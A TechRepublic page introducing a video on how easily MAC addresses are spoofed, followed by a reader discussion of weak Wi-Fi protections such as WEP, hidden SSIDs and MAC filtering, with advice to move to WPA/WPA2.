Wi-Fi

Video: How to spoof a MAC address

MAC address filtering is often used to secure older wireless equipment. Is this technique effective? In this IT Dojo video, Bill Detwiler shows you just how easy it is to spoof a MAC address and why MAC address filtering might not even keep out the "slacker hackers."

When you support small offices, home offices, and remote offices, you often run across older wireless equipment. Equipment that's likely secured with MAC filtering and perhaps a hidden SSID and WEP encryption.

I think most techs would agree that MAC filtering alone isn't going to secure a wireless network and that even WEP and a hidden SSID aren't much better. But, does MAC filtering at least keep out the lazy hackers? In this IT Dojo video, I show you just how easy it is to spoof a MAC address.

After watching the video, you can read the original tip in Chad Perrin's article, "How to spoof a MAC address". For more wireless security tips, check out the following TechRepublic Resources:

About

Bill Detwiler is Managing Editor of TechRepublic and Tech Pro Research and the host of Cracking Open, CNET and TechRepublic's popular online show. Prior to joining TechRepublic in 2000, Bill was an IT manager, database administrator, and desktop supp...

69 comments
marc.casillo
marc.casillo

I thought it was FreeBSD.... :) frash@#freebsd

perezwilli
perezwilli

Thanks a lot !!! Very useful. Wortiz

jamiepartlin
jamiepartlin

It does explain everything well but what he says about not being able to use the same MAC address as someone else on the network isn;t true you can use the same one as long as you have a different IP address as that is what gives you your identity on the network

harryxebec
harryxebec

I refuse to install Flash. That means your video is crap, and I haven't even seen it.

efialtis
efialtis

This is the term commonly used when simple steps are taken to secure a network, but any ONE step alone isn't much of a security measure, more like an obscurity measure. First, lets define "hacker" in the "bad" sense: black-hat hackers are malicious. They want to get in to a computer system, steal something, destroy something, or "have a little fun at someone's expense. These individuals usually aren't going to spend a lot of time spoofing mac addresses, cloning IDs or banging ports, they are looking for a "quick fix"; an unsecured network, or an open system. That being said, simple security measure can be taken. Use MAC Filtering: this will slow them down. Use WEP (at a minimum) and don't use key #1, but use key #2, #3 or #4. Something on the order of like 90% of people use the DEFAULT configurations to lock down their network, so 90% of BHH are going to concentrate their attacks there. Hide your SSID. This will let them know only that there is a wireless network out there, getting the information will be more difficult. Each one of these ideas, alone, isn't really enough to call your network secure, but add them all up and you get "security" through different "obscurity" methods. A BHH might try one or two of these to get into a system, but they don't go through all that much trouble when there are SO MANY other, open systems. It works the same as putting an ADT sticker in your front window; your neighbor's house (without the ADT sticker) is now more appealing than your's...even if you DO NOT have an ADT system, just the sticker (the criminal isn't going to know this, and won't take the chance)...

rgkrishn
rgkrishn

The video is only 5min but seems to take forever with the real commands used lasting only a few seconds - and so are Bill's other videos - it would be best if: 1) if all the videos have the text article link for the impatient readers 2) the speech delivery is shortened and video is edited to be concise to the point.

Gerbilferrit
Gerbilferrit

I've been on to our manager about getting rid of mac filtering on our network firewall, and to use the firewall's ability to autheticate legitimate users to break out of the network, and while taking an interest at first hasn't done much about it :( what do you guys use instead of mac filtering on your networks out of interest????

janhendrik.vanmanen
janhendrik.vanmanen

Very good. Even digital nitwits (like my boss) around me now understand why I want to upgrade the WiFi routers.

s.blaise78
s.blaise78

It was very helpful. As an expert I saw some news. Thanks a million Bill.

blarman
blarman

So the one thing I didn't catch was how to determine which MAC addresses the target network would allow. Since there are billions of possibilities there, how do you figure out which ones (for a home network that list is probably

michaelsaltmarsh
michaelsaltmarsh

Security is an illusion.... look up an os called Back Track 3 ;) remember kiddies.... .....If you set up security by the book, you will get hacked by the book......

jake.conk
jake.conk

I'm one of those people who use a hidden network with a password and required MAC addresses. What am I supposed to upgrade to in order to prevent people from using this technique so I can "feel" safe?

sysadmin
sysadmin

great one bill didn't know how easy that was

zgozvrm
zgozvrm

This video was helpful in showing how easy it is to bypass MAC address filtering. Although we're told that we need to upgrade our networking equipment if the only protection we have is MAC address filtering, hidden SSID, and WEP encryption, we are NOT told what features we DO need to have in our new equipment in order to thwart any would-be hackers.

mghcw3
mghcw3

You mention at the end of the video that it's time to upgrade, but you do not mention as to what to upgrade to.

Dumphrey
Dumphrey

To the point. I look forward to the WEP cracking video, many people need to see how easy it really is. And while many TR regulars may throw a wobble if you do it, thats them reacting out of habit. WEB cracking is to hacking as breaking an egg is to being a pastry chef...

reisen55
reisen55

A consideration I have with my wireless network clients is relative proximity to outside attack. In Monroe, NY, the most likely prowlers are squirrels on trees. OK, not too much traffic there. Here, standard rules apply nicely. I do not anticipate major hackers traveling up 60 miles from Manhattan to target a wireless network on the pure whim that something might be there at this specific address. New York City is another matter. One of my colleagues was using his laptop at an internet cafe and decided to check the wireless connection he picked up. It was not from the coffee shop but from (are you ready?) .... MORGAN STANLEY just across the street!!! Wide open. Go figure sometimes. He released his connect instantly. A lawyer at an insurance company midtown Manhattan looked out across the city scape and spotted the unique CITIBANK building whose wireless network he was picking up too. At floor 38, there were few other buildings (none really) blocking signal. A local customer in New City, NY needed his home computer setup for wireless. He lived in the rather horrible New City Garden apartment complex (a place to really avoid) so I drove up, parked and turned on laptop with Netstumbler to see how many wireless points were wide open. Counted 20 of them!!! Amazing world, is it not.

seo
seo

I would like to design an application that certify by MAC address. This is bad news for me. Ho Nguyen http://VietBDS.com ? The ultimate property gateway

Neon Samurai
Neon Samurai

In a wireless network, you can use the same MAC and same IP as another wireless node. In a wired network, routing controls will likely have problems provided the two systems allow you to duplicate MAC and IP. A wireless network simply broadcast the communication packets so two nodes recieving and processing packets for the same MAC address is very possible. The secondary machine could do this without an IP at all if the wifi encryption is not turned on. In an open network, you can cause some confusion by borrowing someone else's MAC and browsing websites at the same time they are; both wireless nodes recieve the server response to the browser and display it. This is due to the broadcast transfer over air rather than more tightly controlled transfer over switched wires. The IP is how a machine is identified within it's subdomain but the MAC address is the definitive identification and how network frames containing your IP addressed packets are exchanged. I think the switching gear in a wired network would have problems with duplicate MAC even if they had different IP though things working on the higher IP level should have no problems.

-Q-240248
-Q-240248

DHCP tries to send the IP address to the duplicate mac, but the other mac gets it and send it a syn packet, therefore duplicate mac never gets an IP to begin with. I don't think yuo can have duplicate MACs on the network, different IPs or not, there would be mass confusion in the mac tables and packets would come out of order and resent and chaos on the net.

Neon Samurai
Neon Samurai

So, you've stomped your little footsies and taken the time to tell everyone that you haven't seen the video yet feel the need to complain about something; feel better? I am curious though. What platform do you refuse to install Flash on and is your choice against having a Flash player due to the quality of the player provided by Adobe or in reaction to every site overdoing the flash media objects?

Neon Samurai
Neon Samurai

(This is mostly for my own interest to test my knowledge since I'll quickly be corrected where wrong) "First, lets define "hacker" in the "bad" sense:" Cracker. Nothing at all to do with Hackers but that's semantics so moving on.. "These individuals usually aren't going to spend a lot of time spoofing mac addresses" The AP MAC, SSID and type of encryption is broadcast in the first network frame to hit the Cracker's tool. The client MAC comes soon after with the first frame it broadcasts back to the AP. Switching the MAC on the Cracker's local machine takes less than five seconds (copy mac on terminal 1, paste behind changemac command in terminal 2, done). MAC filtering is only of use for having your AP ignore frames from NIC it does not think it recognizes. Spoofing a MAC to one the AP does recognize is done simply by anyone. It won't slow them down; consider it a given that you MAC can/will be spoofed then be surprised when it doesn't happen. "Use WEP (at a minimum)" - no, WPA is the minimum, WPA2 preferred. Bare with me a moment and I'll clarify. If you have a device which must have network connectivity and only provides support for Open or WEP then at minimum, use WEP plus every other setting you have available. Be surprised when all of that does slow someone down rather than assuming your safe because of it. It is better to consider how badly you need that device on the network along with the rest of your wireless world. You may be able to live without or you may find that upgrading your hardware to something supporting WPA In my case, such a device was my often lamented Palm T5. After buying a wifi router, I had to buy the SDIO wifi nic from Palm. It was great fun, I could keep ICQ/MSN/* connected and with me like a phone without being attached to my desktop. I could use VNC on the Palm to reach through the network too my desktop. Neither function justified running my entire network on WEP when every other device supported WPA so the SDIO card only saw use as a pocket network scanner when out and about (great little warwalking program available for Palm). Now, even the Wii connects by WPA; no WPA then no access to the network by wifi radio. As mentioned, I said bare with me a moment; I?m harping on WEP because it seems to come up constantly as ?the minimum anyone needs?. This week has been ?break my wifi? week for me at home which means my secondary router is doing time as a test dummy named ?Ducky?. I breached it with a PDA, two hours of traffic and eight hours of rest. Wifi2 (arbitrary WEP wifi client node) was connected to Ducky appropriately using one of the for generated WEP keys. Wifi1 (N810, ok, not quite a PDA but close) was left as a third party doing the packet capturing. I then did a few hours of low security browsing over the WEP network to generate traffic; some youtube videos, the usual news sites less my regular logging in? I thought the packet count after two hours would not be enough but it was time for bed so Ducky get?s unplugged, wifi2 gets shutdown, wifi1 switches to alarm clock mode as it does each night and the capture file went to my desktop. Assuming I hadn?t caught enough traffic, I left it running against the cracker as a burn-in and heat test for my cpu. I was rather surprised to see the WEP key staring back at me the next morning when checking to temperature and cpu condition. ?But NS, no one is going to spend two hours listening then a night waiting? I hear you say. For a targeted hit, darn tooting they will but we?ll assume a casual snoop. They can use something small like a PDA in a weatherproof case if they are brave enough to leave it unattended. They could be close enough to simply wait in attendance (parked car or whatever). They may be inspired by the challenge in which case it becomes a targeted attack though not contracted. They will also be using a prepared notebook with tools that are going to make my quietly passive two hour wait a brief but noisy five minute wait. My small number of packets took over night (still have to check the actual processing time) to pop the key but the brief yet noisy approach is going to spill out enough packets to pop the key in two or four minutes or processing. For those who have not heard WEP is dead. It was sickly and in the hospital before but has long since passed on into the realms of ?weak encryption? of little more challenge than a speedbump. If you?re a home user, consider upgrading to hardware that can do WPA or better for (x < 100$). For businesses; no excuse for using WEP. ?Hide your SSID? ? nope, broadcast it. A hidden SSID is still broadcast with every network frame due to how wifi networks function. The only place you are not seeing a cloaked SSID is in the ?Available Wifi Networks? or in less complete wireless network scanners. Anyone who is looking for wireless networks is already using a tools that tells them SSID, channel, encryption and MAC addresses by default. Assume that information is already freelly available because, well, it is. There is no improvement of security by not showing your SSID. It actually reduces your security since your wireless devices will have to constantly call out asking if the router can hear them. A quick scan of wireless in any city will return a long list of unattached wireless devices calling out for all the cloaked SSID networks they know of. (MSHOME and HOME seem to be the most popular around here) Your actually better to broadcast your SSID. Your devices will know it?s broadcast so they will listen for it rather than call out constantly (no spraying your wifi info across the subway car on the way to work). My area is crowded so I also hope that other?s will see what channel my network SSID is broadcasting with and choose a different one though I still have to change channels every few months because of congestion. The real problem is that cloaked SSID, WEP keys and MAC filtering is still nothing more than a speedbump even when all are combined. It?s a ?feel safe? strategy instead of a ?am safe? strategy. I?ve taken all of these ineffective steps so I must be safe rather than taking one truly effective step and actually being safe. - Change your SSID to something identifiable. - Broadcast the SSID so other?s see your channel and you don?t anounce it to everyone away from home. - Change your wireless security to WPA with an eight or more character passkey. - Disable ?administration from wireless network? and ?administration from WAN? so that only internal wired connections can access the router administration gui. - Change the administration password to something non-default and strong. That is the minimum configuration for any router and it takes less than five minutes to configure. If you want to filter out unknown wifi devices, add in MAC filtering but realize that it is only reducing how much your router cpu has to process rather than providing any real security advantage. The steps that it takes to oporate a wireless network safely are to simple and supported by enough hardware that there is no excuse. If you use WEP or leave your wifi router wide open it is the same as leaving yoru front and back door open when away from the house.

efialtis
efialtis

Now, if you believe Security through Obscurity is "ineffective" then you need some schooling... StO is effective, in MOST cases. I work in Security and Computer Forensics. MOST people, that take simple precautions, do NOT feel the effects of a hacker. Each precaution taken makes the network just that much more effective. Now, if you feel that you need more security, you have a determined hacker, or you want to keep a "professional" like me out, well, there is a bit more that needs to happen. Buy GOOD hardware. Linksys has some fantastic hardware (as does D-Link, and others) that lets you use higher encryption standards, and built-in attack detection and monitoring. This and the "obsecurity" methods should be used together. Get rid of Windows and move to Linux. This simple thing will secure your computer almost all by itself. (and there are a lot of "obsecurity" methods you can use when installing Linux (changing the root and home directory's names, etc) Use strong encryption software. Securing communications and hard drives helps a lot. Install security programs. "fail2ban" is a nice one, and there are many others. Disable ports, lock out unknown IP addresses, use strong passwords, etc. All this can be done in a couple hours, so it isn't hard or complicated, and it can stop hackers. Then you have to "secure your people" that work or live with you...they cannot download crap and install it, they cannot surf porn, etc...or all your security will come to an end from the inside.

SgtPappy
SgtPappy

Give it a rest. The man is trying to provide a service. The little movie provided some valuable information for some people.

Neon Samurai
Neon Samurai

The short answer; 99% of tools provide SSID (cloaked or not), channel, encryption type and MAC addresses for router and client. I think netstumbler is the only tool that does not decloak SSID otherwise the statistics guess would be 100%. The long answer: Wireless networking works at the data frame level and fools the client into thinking it's on a normal wired network. Basically, the router/client connection does all the wireless magic and presents both ends with just another network interface device. Frames are passed between systems based on MAC address. You may choose a human readable url (google.ca) which is then converted to an IP (###.###.###.###) but that is actually then converted to a MAC address for routing and switching. Your data packet pieces (payload) of the frame can be encrypted but the sending and recieving MAC address must be unencrypted. With wireless, the SSID is also required as an identifier of what network the frame belongs to. The router's MAC can't be used because some SSID span multiple routers in larger networks. The first frame broadcast will probably provide valid MAC for client and router. It will at least provide the client MAC with the second exchange providing the router MAC as it answers back.

Neon Samurai
Neon Samurai

ha.. Actually, that is probably truer than I originally intended. I have to write that one down on my list with "nostalgia is not what it used to be". I?ve always though of security as more like standing in front of an oncoming transport truck. You are in plain sight and it is rushing at 55 miles or more. A high level of security means knowing that when it gets to you, it won?t do a damn thing. No hiding or dodging out of the way; it just simply won?t pass authentication or cause any harm. For a truly high level of security, you should be able to post your policies and mechanisms on a billboard out front and still have no one without valid authentication keys able to get in. Any potential security value in obscurity is the myth that won?t die though. Obscurity only has value for the attacker sneaking about, not the defender.

blarman
blarman

Upgrade your wireless access point to one that supports WPA2 passphrases. This may also mean upgrading wireless adapters to similar versions supporting WPA2. Setting up WPA is as hard/easy as setting up WEP. THe end result however is a much hardier network.

Neon Samurai
Neon Samurai

MAC filtering may reduce the number of packets your router tries to process by ignoring unrecognized MAC. SSID is equaly visible if broadcast or "cloaked" so you may as well tell everyone your there on a channel and hope they choose a less populated channel. WEP is easy to break though doing it fast means being noisy. Home users should avoid at all costs. Big business probably won't consider it an option though an IDS/IPS that monitors wireless traffic can help. The real wireless security mechanism is the connection encryption in the latest form you can support. These days, that means WPA minimum or WPA2 perferably in the home consumer market. If your buying for home: - choose good hardware - change and broadcast the SSID - disable "allow administration from wireless network" the option is available - set a strong admin password - set a strong wireless WPA or WPA2 passphrase (not matching admin password) If your like me and can't leave any setting un-adjusted, continue to change any other options but unique SSID, strong WPA-PSK, strong admin and no wireless administration are the minimum settings. If this is for business and consumer grade hardware is going to be underpowered then your buying process should include consulting a security specialist and looking at what enterprise wireless can offer for authentication and encryption options. Consider an IDS/IPS that monitors wireless traffic also.

Bill Detwiler
Bill Detwiler

You should upgrade to wireless equipment that supports WPA/WPA2-PSK at the very least--although PSK implementations can be compromised if an attacker learns the pass-phrase. Enterprises should implement 802.1x instead of PSK-based authentication. WPA2 using either PEAP, TTLS or EAP/TLS for authentication would be best.

Bill Detwiler
Bill Detwiler

You should upgrade to wireless equipment that supports WPA/WPA2-PSK at the very least--although PSK implementations can be compromised if an attacker learns the pass-phrase. Enterprises should implement 802.1x instead of PSK-based authentication. WPA2 using either PEAP, TTLS or EAP/TLS for authentication would be best.

AnotherThought
AnotherThought

Don't get sucked in to dismissing your network security just because you think no "major hackers" are going to be hanging out in the willow grove with you in Monroe. You're overlooking a huge source of security breaches... teenagers with free time. If the town is that sleepy, you can be sure the kids are certainly more bored with it than you are. :) These days, its a piece of cake for a kid (or anyone else) to download complete exploit kits from the web (for free) and cruise around with them installed a cheapo Dell laptop and a freshly minted driver's license, just to see what they can find. My office happens to be near (right next door) to a hotel in a fairly quiet town that occasionally hosts youth conferences that last several days. I can watch all the hits on my wireless router that start happening pretty consistently about 30 minutes after the kids are done for the day. Most of the hits are just the kids looking for an open network so they can surf YouTube/MySpace or whatever. Invariably, though, over the course of these events, I'll find evidence of a few trying vigorously to break in to the network, presumably just for the sake of saying they've done it. The network has a rather generic name, so there's nothing particularly tempting like "Citibank Backoffice Network", but they still pick at it regularly. My suggestion would be, if you're not going to tighten up the network, at least turn on logging and keep an eye on it once in a while. Hopefully you won't find any teen spirit wafting through there...

Neon Samurai
Neon Samurai

I was on my way to small town canada for a weekend and amuzed myself for the busride by counting the wireless networks. I gave up the passtime after we went through a town and I lost cound around 15 breachable networks, about 5 completely default routers or wide open and a very small minority of WPA or better networks. The handy little app even told me about a few unassociated nodes calling out for there network where the client of a broadcast SSID usually knows to wait quietly rather than anounce the network all over town.

andrew.salinger
andrew.salinger

Anything is possible, but just because it says the signal said "MORGAN STANLEY" does not mean that it was. If I was thinking of a way to phish information from anywhere, a good start would be to put up a bonus wireless network, which may provide access, but may also just be capturing packets. Even if the coffee shop was providing access and you knew it was from the coffee shop, it still is not the safest way to obtain your wireless connection. Paranoid? maybe, but safer is better for me.

Dumphrey
Dumphrey

when you consider how little many people understand about computer and network security. As other TR members have pointed out, what is even more scary is the bad advice mnay "professionals" give to people and perpetuate the mac filter-WEP combo. "I do not anticipate major hackers traveling up 60 miles from Manhattan to target a wireless network on the pure whim" but what about the kid next door, so he can download a new movie? WEP is the security equivalent of a screen door with a lock, sure, its locked, but only for as long as it take to put a hole in the screen. WEP provides zero real security, and almost no denial/reasonable doubt in the case of your network being used for illegal purpose.

Snoop101
Snoop101

Thank you for a simple, but informative insert on wireless security topic.

Neon Samurai
Neon Samurai

There are some good ways to confirm identity depending on what your program is going to do but MAC addresses have always been changable. They are nothing more than the true location identifier that sits behind the IP address the same way the IP is the local location identifier that sits behind the human readable domain name. On the up side, it's better to learn of this now rather than after adjusting your program has become too complicated.

bboyd
bboyd

I can empathize with his dislike of flash but no sympathy for the rude response. I'm glad noscript lets me be granular about allowing flash to run. still worry that I have to have Adobe code on my machine.

wellsd
wellsd

Don't forget that if you are doing web based administration of the router if you are not using https SSL/TSL then you are sending login and password in plain text over your network. And if someone happens to be monitoring your traffic at that point, they now own your router and will lock you out of it. One of my colleges has a bad habit of network scanning and locks the users out of their routers and renames the SSID to "F**kMeIMaSheep" and set her laptop to automatically connect to that SSID and can get a connection most everywhere we drive. So I have seen this work. AirPcap is a wonderful tool, as is wireshark

InfoSecAuditor
InfoSecAuditor

Wow Neon. Great job. You beat me to it. If you're not in InfoSec...well, maybe you should be? In response to the OP, I'll reiterate from an earlier post that I made. Security through obscurity simply isn't a viable option. If you think it is, here's a question for you: Would you be willing to bet your career, your financial stability and even your identity on an environment that uses STO (hey, I like acronyms too) as one of its founding principals? Personally, I've been working in the IT field for over a decade and a half (before that I was in public safety/government), and in the InfoSec space for over seven years. I perform security audits (physical and logical) at our company's secure domestic and international facilities (we're a federal, state and local contractor that builds and manages prisons), as well as vulnerability assessments and penetration tests. A significant amount of my work is assessing wireless network security. Additionally, I hold a Master's in InfoSec from an NSA certified curriculum and a number of industry certifications (I think I broke my arm patting myself on the back). My point is, I think I'm sufficiently "schooled" to provide the above opinion, TYVM.

Neon Samurai
Neon Samurai

If you are still including obscurity into your security processes under the assumption that it adds to your security, you may want to reconsider also. Obscurity only has value for the attacker. It is a short lived advantage; "crap, where is he.. [advantage].. there is he! [advantage gone]" If you use an obscure OS, the attacker is going to learn the OS and now it's not obscure. If you obscure your IDS, the attacker is going to assume you have IDS so it's not relevant either. If you accidentily gain an advantage through obscurity then great but don't purposefully count on that when assessing your security posture. Real security is provided by the mechanisms not how well they are hidden. The only advantage in obscurity is for the attacker who must remain hidden as a foreign object avoiding detection. In that case, obscurity's short lived advantage can be long enough to plant a seed and sneak away. In the digital relm, you have to assume your obscured protective item is going to be found because it will be. You want to be able to stand up, anounce your presents and still deny access to anyone who fails authentication. (now I read your profession.. ha.. I'm probably over my head but what the heck I'll keep swimming.) I agree with the rest of your post As a security professional, what value do you see in obscurity? Where do you see security by obscurity providing advantages? Is it only as an agitant by changing default paths? (serious question as I'm curious to understand different points of view though mine has already been expressed)

brad
brad

I guess the practice of hiding valuables from sight when parking the car falls under StO? The only time my car has ever been broken into was when some valuable of some sort is visible through the window. Learned a hard lesson there. :-) In a home network, everyone has to use it (except the dog) so it needs to be friendly. So, there's a tradeoff between user-friendly and hacker-unfriendly.

stuvorn
stuvorn

I agree, the "suggestion" was delivered without much tact but its essence was certainly valid. Why not cater for both audiences: more technical time poor & less technical (probably still time poor!)

Neon Samurai
Neon Samurai

That's the part that kills me, it's the difference between selecting option B instead of A from the router's admin interface. In the case of routers and NIC that don't support WEP; yeah, it's better to upgrade for the amount it costs today (100$ or less is the cost of a router). In the case of built in wireless radios that only support WEP or less; consider dropping them. In my case getting my WEP only PalmOS device an internet connection was not worth reducing my entire network to WEP; the Palm got no network access instead. I don't even allow .11b let alone WEP so it was out of luck on two accounts.

garyleroy
garyleroy

I don't see what you get out of this, are you planning on ripping of info for your own use, or you just like finding wireless networks? Ever thought of looking at the scenery on your bus ride, reading a book, whatever? "What'd you do on your vacation?" "Oh man, it was great, I found over 300 wireless networks I could get into, what a fantastic trip!" Then for exercise you what, play games on your iphone?

Neon Samurai
Neon Samurai

A number of early company breaches where due to some office genious deciding they wanted wireless for there work notebook and making a trip to radioshack on there lunch hour. A few rather high profile new stories where due to wide open routers attached to huge companies. My first thought was self installed router but the idea of a honeypot came to mind next. Spoofed access points are one concern for fishing or outright overpowering the valid ap to steel it's client nodes. The bigger curiosity for me is the number of people who will "interweb" away freely thinking they cleverly got free access without buying a coffee; "ah, good, I've got a connection. Now, how is my personal email doing since they block it upstairs in the office?" Once I get a spare rig running honeyd, I think I'm going to leave my secondary router broadcasting "jackthisbtch". It'll be interesting to see who in my area is foolish enough to use an unknown network or who wants to play. I may even get brave and tunnel it through my valid network to save faking websites and monitor what categories of information get passed along. (The interest is the types of information not logging plain text or breaking encrypted packets; if that is important for anyone to know.)

brad
brad

From a user perspective, how would a user know if their Wireless network has been hacked using the steps Bill outlined? What are the symptoms of a hack?

poolmanjim
poolmanjim

Why would any kid be that persistent? The odds of a serious hacker taking on a home network are very slim and your every day college kid with a laptop isn't going to think about spoofing or cracking WEP. In my opinion, MAC filtering and SSID hiding is a reasonable (far better than most) when securing a non-essential home connection. The odds of some serious hacker taking you on while you are at your house is so small that it shouldn't be considered. Don't get me wrong, I am a huge fan of security but sometimes you have to consider if the work is worth the reward and in the instance of an every day home. Why would a hacker take a home network for his illegal uses? He can go buy a Big Mac and use the free wireless that McDonalds has and go bouncing around if he has any good proxy software.

Neon Samurai
Neon Samurai

I don't have much new machine traffic on my home network so it's just a matter of confirming my wife's machine connects when the preshared key is changed then updating the few guests as applicable. I've found WPA completely user-friendly while being cracker-unfriendly. I also go a step further and use MAC filtering to reduce the noise my router processes but that's not part of the security considerations. If you've one of the Linksys routers with an external "easy setup" button and flash the router with ddWRT instead of Linksys firmware, you can set that physical button as a wifi radio "on/off" switch so when you are not using the wireless, you can turn it right off; nobody without physical access to the router is getting past that puppy.

Neon Samurai
Neon Samurai

It's a trip I've made by bus frequently; nature doesn't cut it for me anymore. You can only walk down the same lainway past the old oak tree so many times before the oak looses it's novelty. I'm actually more curious as to why the person was so offended that one would be entertained by exploring technology. Even worse, how someone on a technology website could be entertained by exploring technology. ;)

Neon Samurai
Neon Samurai

You may be a world class bowler. While bowling bores me to death, I'm not going to give you grief because you choose to role a rock at five or nine pegs of wood on your free time. Should we give professional race car drivers grief for spending a day at the track then going for a drive in there own car on the weekend? I spend eight hours a day doing other's bidding with a stock OS build that mostly meets the needs of the job. In my free time, being able to do what I want with machines is is relaxing freedom. Some users just want to check there email. Some users want to check email but also know enough to tune the system for a specific game or other task. Knowing what the settings do is less important than seeing a higher frames per second count. Some users want to know how each step of the process works and have the freedom to explore and ulter it. Technology is a thing to be playfully and creatively explored. Understanding the technology and how it can be extended in creative ways never dreamed of by the manufacturer is the ultimate goal. I am of the third. I want to explore what technology can do not what limited functions the manufacturer sells it for. Once you finish the user manual, start learning what the thing can really do. To answer your question. It was for personal interest to see how the breakout of wireless networks apeared; professional curiosity. And because the device was new and I wanted to explore what could be done with the NIC radio and various related tools. Since I did not log any of the passing packets; it was only for interest with nothing saved for later analysis. What else am I going to do on a bus ride? Learning what my device could do seemed more productive than sleeping, watching video reruns or the rest of the generally passive travel activities. If it's that important to know; I also mountainbike, skateboard (you get strange looks when traveling to the office in a suite and board ;) ), snowboard, swim and study Iaido. I've had to give up Jiujutsu do to location relative to the dojo. My vacation activities depend on where the vacation is but you can bet I'll use some of that free time for my own computing whims also. I haven't an iPhone; it simply does not provide the functions I get with my existing devices. The monthly plans are also highway robbery made possible only by blind brand loyalty. Now, what recreational activities do you spend your free time persuing so we can all point out which ones bore us indavidually?

michaelsaltmarsh
michaelsaltmarsh

doesn't sound cool when you say it... :( LOL Sorry to break it to ya, but well some of us think that nature is well for the birds ;) Now i can't speak for neo here but i am not really a big fan myself. The shock and awe that goes along with finding lots of wide open networks does sport some entertainment while having to endure all of that organic garbage.

Neon Samurai
Neon Samurai

Watch your traffic and be aware of what machines should be connected. In a home network with only a few nodes, this is not hard to do. If I get a connection apearing that is in my guest IP range (I use statically assigned dhcp) and I don't have a guest over then it's a visitor. if I get a connection outside my guest range and that machine is not booted, I have a visitor. If I start seeing large amounts of traffic and am not making heavy use of the network, it might be a visitor. If you are connected and someone spoofs your MAC, you will also get some strange behavior. You may be a bit confused when recieving web pages in your browser when they have been requisted by the visitor's browser (same MAC means you'll both recieve the network traffic). The best way to be sure without going security overboard is to use WPA with a passkey changed regularily. Disallow router administration from WAN or Wifi so only wired local machines can change settings. Make your admin password different from your wireless password. Last, get to know your network traffic a little; casually watch connected clients lists for what machines are "on" and note your average upload and download amounts. The spoofed MAC is the part that really puts the grief in detection since the visitor will apear to be a valid network node unless you know that node is shutdown or it start to colide with the visitor.

smarria
smarria

Because its so easy why would someone travel to a WiFi hotspot when your weak network is next door? A serious hacker might be interested in stealing your identity. Most people do a great deal of banking and other transactions online as well as keeping sensative documents like tax returns on their hard disks. It would be very easy for a hacker to access this information once he is in your network.

Neon Samurai
Neon Samurai

I don't think a kid is going to be motivated to travel 60 miles for a casual look. The neihbor's kid is not a real concern though since real criminal enterprise took interest. - anonymous communications through a breached and unaware third party network -- the FBI or some other acronym would like to understand why your talking to someone on a watch list. What did you discuss for the hour long voip, three email transfers and two large file direct transers? - anonymous downloads of criminal content -- the FBI or some other acronym would like to talk to you about the RIAA protected movies and questionable images of small children that have been recieved at your network address - reconnaissance for a high-tech burglar if it's that nice an area -- you'd like to know how your fantastic home security with cameras in every room all controlled from your personal computer on the network got broken into and why only the really good stuff was stolen - information gathering -- enough information to fake an identity can be sold easily. Now someone has enough information out of your network shares, cookies and other personal files for a classic case of fraud. They also have a little "something" left behind to watch your network traffic and send off your new passwords as you change them. It?s not the network or it?s access location but what someone intends to do with it. This all has to be balanced against reasonable threat of course so it shouldn't send someone running in paranoia. With WPA being so easy to manage, there really is no excuse for leaving it open. If your intentionally leaving it open, make the SSID obvious; "freewifi". Someone else has already mentioned the basic principle of obscurity. It may accidentily provide some benefit but should not be considered part of your security profile and decision making.

Dumphrey
Dumphrey

for normal pass keys. The current record is 8 seconds with a nice laptop. These are not hackers we are talking about, but normal kids. The tools are widely and freely available, and fairly well documented. Anyone with basic linux skills could learn to do this off the internet useing google in under an hour. Maybe 2 hours on windows. "Why would a hacker take a home network for his illegal uses? He can go buy a Big Mac and use the free wireless that McDonalds has and go bouncing around if he has any good proxy software." Once again, why does it have to be a hacker? P2P chargers are your most likely offense. The kid next door using your wifi to download the latest movie. "Why would a hacker take a home network for his illegal uses? He can go buy a Big Mac and use the free wireless that McDonalds has and go bouncing around if he has any good proxy software." Or he could use your wifi, not need proxy software, and have no corporate records of his activity being logged. Since cracking wep is as easy as setting up a proxy server. Finding a mac is a joke, and non-broadcast ssid is even less effective then paper parachutes.

InfoSecAuditor
InfoSecAuditor

Sorry Poolman, but your logic is flawed. Your "every day college kid", or high school kid for that matter, has a plethora of freely available tools to help him/her hack into your wireless network. Heck, it's so easy even the FBI can do it. And if we're talking about not having the time to do it, well, who do you think has the most free time on their hands? Security through obscurity does not work. Period. You may not think that home users have a need for wireless security, but the first time someone cracks WEP (or spoofs a MAC, etc.), hops onto your home network and pulls seemingly innocuous information (you know, like bank userids, passwords, etc) or uses the connection to download questionable material, you may change your tune. And in terms of the "work" required to secure a wireless network, I think that's a non-issue. Most consumer grade APs that I've come across provide a fairly easy interface and step-by-step instructions that illustrates how to secure your wireless.

Editor's Picks